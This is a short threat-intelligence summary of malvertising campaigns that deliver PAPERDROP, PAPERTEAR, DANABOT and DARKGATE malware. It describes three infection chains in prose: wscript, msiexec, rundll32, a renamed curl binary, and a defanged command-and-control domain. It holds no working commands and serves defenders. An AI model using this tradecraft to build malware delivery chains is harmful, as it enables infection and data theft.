Threat actors are purchasing advertisements for malicious websites to lure victims into downloading malware, which can eventually lead to data theft and ransomware. This technique was used in several ad platforms, including search engine ads and social media ads. There have been four different malware families observed during the investigation of these malicious ad campaigns: PAPERDROP, PAPERTEAR, DANABOT, and DARKGATE. Three different delivery chains were observed, with two of them using a renamed version of cURL binary.
In the first infection chain, the wscript.exe process is used to initiate a DNS request which then executes the Windows installer utility msiexec.exe and installs an application. Furthermore, it uses the rundll32.exe process to load the dropper DLL and executes the “start” function to launch the DANABOT payload.
In the second infection chain, the PAPERTEAR downloader initiates an HTTP POST request to infocatalog[.]pics over port 8080. After this, the wscript.exe executes the one-liner command that eventually drops the DARKGATE malware onto the victim’s system.
The third execution chain is similar to the second one, but here the PAPERDROP downloader executes another extended one-liner that uses the renamed curl.exe binary for downloading and installing a malicious package file which drops the DANABOT malware.
Overall, threat actors are using search engine ads to deliver malware and have been observed using different malware families and delivery chains. The specific methods used in these infection chains are described in detail in the published report, along with indicators of compromise such as domain names and IP addresses.